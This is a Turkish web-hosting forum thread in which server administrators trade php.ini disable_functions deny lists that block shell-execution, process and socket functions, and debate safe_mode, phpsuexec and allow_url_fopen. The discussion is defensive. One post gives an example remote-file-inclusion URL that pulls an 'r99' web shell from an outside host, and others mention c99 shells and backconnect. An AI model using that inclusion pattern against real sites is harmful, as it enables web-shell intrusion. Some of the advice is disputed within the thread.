disable_functions

merhaba
Forumda aratmama rağmen tam olarak istediğim şeyleri bulamadım.
Sormak istediğim; disable_functions ile hangi fonksiyonları engelleyerek sunucumuzu maximum güvenli yapabiliriz? Tabi güvenli olacak diye standart şeylerin bile çalışmaması bir işimize yaramaz.

Hangi fonksiyonun ne işe yaradığına dair bir döküman hazırlanırsa herkesin işine yarayacağını düşünüyorum.


Benim kendi araştırmalarım sonucu bulduğum bazıları aşağıdadır:
disable_functions = shell_exec,exec,system,shell
php.ini dosyasının bir yedeğini almadan denememenizi tavsiye ederim.

(/etc/php.ini)

Teşekkürler

disable_functions=
popen,pclose,posix_getpwuid,posix_getgrgid,posix_kill,parse_perms,phpinfo,system,dl,passthru,exec,
shell_exec,popen,proc_close,proc_get_status,proc_nice,proc_open,escapeshellcmd,escapeshellarg,show_source,posix_mkfifo,
set_time_limit,mysql_list_dbs,get_current_user,getmyuid,pconnect,link,symlink,pcntl_exec,ini_alter,parse_ini_file,pfsockopen,
leak,apache_child_terminate,posix_kill,posix_setpgid,posix_setsid,posix_setuid,proc_terminate,syslog,fpassthru,stream_select,
socket_select,socket_create,socket_create_listen,socket_create_pair,socket_listen,socket_accept,socket_bind,socket_strerror,
pcntl_fork,pcntl_signal,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,openlog,apache_get_modules,apache_get_version,apache_getenv,apache_note,apache_setenv,virtual

Fakat bazı portallar, burdaki fonksiyonlarını çalışmasını gerektirebilir, eğer hata olursa o portal hata yazdırır ve fonksiyon adını belirtir sizde ona göre listeden kaldırırsınız.

yukardaki ozelliklerin disable edilmesi guenlik acisindan iyi olur ama dinamik yazilim kullanmak nerdeyse iskenceye doner

çok ağır işkence olmaz ama yine de uğraştırır, en güzel yolu Safe_Mode = On yapılır,risk minimuma iner, eğer safe_mode off isteyen müşteri olursa domainin httpd.include (plesk sisteminde var diğerlerini bilmiyorum) php_admin_flag safe_mode Off yazılır domain bazlı safe mod açılır.

sadece safe mod yeterli olmuyor başıma geldi...

disable_functions kullanmak şart

safe mod sonrası aşağıdaki ayarları kullamaktayım, pek bir problem çıkarmıyor.

disable_functions = system,dl,passthru,exec,shell_exec,popen,proc_close,proc_get_status,proc_nice,proc_open,allow_url_fopen,chown,chgrp,escapeshellcmd,escapeshellarg,show_source,posix_mkfifo,set_time_limit,mysql_list_dbs,get_current_user,getmyuid,pconnect,link,symlink,pcntl_exec,ini_alter,parse_ini_file,chmod,pfsockopen,leak,apache_child_terminate,posix_kill,posix_setpgid,posix_setsid,posix_setuid,proc_terminate,syslog,fpassthru,stream_select,socket_select,socket_create,socket_create_listen,socket_create_pair,socket_listen,socket_accept,socket_bind,socket_strerror,pcntl_fork,pcntl_signal,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,openlog,apache_get_modules,apache_get_version,apache_getenv,apache_note,apache_setenv,virtual
allow_url_fopen off
enable_dl off
expose_php off

Saygılar..

wbb3 içiin

arkadaşlar kısa bir not bırakmak istiyorum. wbb3 (woltlab burning board 3) te sorunsuz kurulum ve güncelleme yapabilmek için chmod ve glob fonksiyonlarını disable_functions 'tan çıkarmanız gerekmektedir.

chmod ve glob un ne gibi zararları var ki?
allow_url_fopen, set_time_limit bu iki fonksiyonun engellenme nedeni nedir.
Her fonksiyonu engellemek çözüm değildir alternatifleri kullanılır.

glob yerine dizin okuma ve preg_match ikilisi
fopen yerine file, file_get_contents, curl vs.
set_time_limit yerine ini_set olabilir.
chmod yerine elle 777 ayarı verilebilinir

Ama ne işe yaradığınıbilmeden engellemek saçma olur. Bazı yerlerde preg_match bile engellenmiş oluyor o kadar yani, direk php yi silin daha iyi

belki ordan bir açık buldu böyle akıl veriyor mesaj sayısına bakınız bir, dikkatli olun derim. arkadaşım iyi niyetinle de yazdıysan kusura bakma maksat ne olur olmaz uyarmak sana yönelik bir şey değil

saldırgan(lamer/heker) mesaj sayısıylamı belli oluyor? o zaman sadece mesaj sayısına değil i-trader'ede bakmalısın. Saldıracak insan akıl vermez burada ben sadece bu işi yapanlara öneride bulunuyorum, her kodu engellemek çözüm değil sonra bir çok yazılım çalışmıyor örneğin glob'u engellersen wordpress çalışmaz? Sence wordpress tehlikeli olduğunu bile bile kullanırmıydı. Bu fonksiyonları engelleyene kadar safe mod on yapın olsun bitsin. Her gördüğün fonksiyonu ne işe yaradığını bilmeden engellersen müşterin azalır - başın ağrır.
Ayrıca üyelik tarihlerimizide kontrol ediniz.

neden bu kadar sert çıkıyorsunuz ben hemen heker lamer demedim. dikkatli olun dedim.

sert çıktığım için üzgünüm ama mesaj sayısına bunu bağlamanızı yanlış buldum. Beni tanımadan niyetimi bilmeden böyle demeniz doğal olarak çıkışmama sebep oldu, he bu fonksiyonların tam olarak ne işe yaradıklarını serverda herhangi bir zaafiyete yol açacaklarını biliyorsanız söyleyin hepimiz öğrenmiş oluruz

Bence sunucuda fonksiyon'ları yasaklamak bilgisizlikten başka bişey değil performansı düşürür.Özellikle forumlarda buradada olduğu gibi saçma sapan copy paste fonksiyonlar verilmiş misal allow_url_fopen bakınız http://tr2.php.net/manual-lookup.php?pattern=allow_url_fopen&lang=en varmı böyle bir fonksiyon ne gelirse insanın başına bilgisizliğinden ezberciliğinden gelir.
Siteler arası geçişi engellemek istiyorsan php'yi cgi üzerinden çalıştıracaksın phpsuexec böylelikle başka dizine geçiş olmayacak müşteri kendine göre php.ini dosyası yaratabilecek istediği fonksiyonu kendi hesabı için açıp kapatabilecek işletim sisteminide sürekli güncel tuttunmu hiç bir sorun kalmaz.

s4l1h' Alıntı:

Bence sunucuda fonksiyon'ları yasaklamak bilgisizlikten başka bişey değil performansı düşürür.Özellikle forumlarda buradada olduğu gibi saçma sapan copy paste fonksiyonlar verilmiş misal allow_url_fopen bakınız http://tr2.php.net/manual-lookup.php?pattern=allow_url_fopen&lang=en varmı böyle bir fonksiyon ne gelirse insanın başına bilgisizliğinden ezberciliğinden gelir.
Siteler arası geçişi engellemek istiyorsan php'yi cgi üzerinden çalıştıracaksın phpsuexec böylelikle başka dizine geçiş olmayacak müşteri kendine göre php.ini dosyası yaratabilecek istediği fonksiyonu kendi hesabı için açıp kapatabilecek işletim sisteminide sürekli güncel tuttunmu hiç bir sorun kalmaz.

Genişletmek için tıkla ...

allow_url_fopen ile yanlış hatırlamıyorsam kötü amaç için kullanılabilir.
Örneğin; siteadresiniz.com/administrator/ali.php?=http://www.fsoyolu.com/r99.txt şeklinde bir URL çağrımı yaptırılarak, tabi scriptinizden açığından yararlanılarak r99 serverinize yüklenmeden script açığı sayesinde siteniz heklenebilir. allow_url_fopen'i açık bırakmanız bunu sağlar.

Coder arkadaşlar daha iyi tanımını yapabilir.

o açık register globals on ve allow url include on iken geçerli gerçi önlemini alırsan onuda yapamazlar ama

http://securityreason.com/securityalert/3547

onun dışında fopen, file_get_contents(şuan sunucu sahibi arkadaşım bunu bile engellemiş), glob, preg_match(evet abartıp bunu bile engelleyenler var) kimseye zarar vermez. Zaten r99 türü dosyaların çalışmaması için belli fonksiyonları engellemeniz yeterli, üzerine gerekli gereksiz ilave etmeniz hem performansı etkiler hemde çoğu yazılım hata verir.

iDealhosting.org' Alıntı:

allow_url_fopen ile yanlış hatırlamıyorsam kötü amaç için kullanılabilir.
Örneğin; siteadresiniz.com/administrator/ali.php?=http://www.fsoyolu.com/r99.txt şeklinde bir URL çağrımı yaptırılarak, tabi scriptinizden açığından yararlanılarak r99 serverinize yüklenmeden script açığı sayesinde siteniz heklenebilir. allow_url_fopen'i açık bırakmanız bunu sağlar.

Coder arkadaşlar daha iyi tanımını yapabilir.

Genişletmek için tıkla ...

Allow_url_fopen bir fonksiyon değil php.ini deki bir değişken php.ini dosyasını acıp
allow_url_fopen Değerini ON Yada OFF yaparak açıp kapatabilirsiniz .
c99 türü yazılımlar zararlı değiller onları kullananlar zararlı hale getiriyor c99 türü yazılımları filemanager olarakta kullananlar var.
Şimdi diyeceksiniz backconnect yapılıyor serverde bu tür scriptler yardımıyla.
Aynı şeyi cpanel yada plesk paneldeki crontab ilede yapılabilinir.
Eğer bunların sunucuya zarar vermesini engellemek istiyorsanız yukarda belirttiğim gibi siteler arası geçişi kapatıp OS güncel tutarsınız her hosting hesabı kendinden sorumlu olur. Kafanız Ağırmaz.
Freebsd Öneririm işletim sistemi olarak.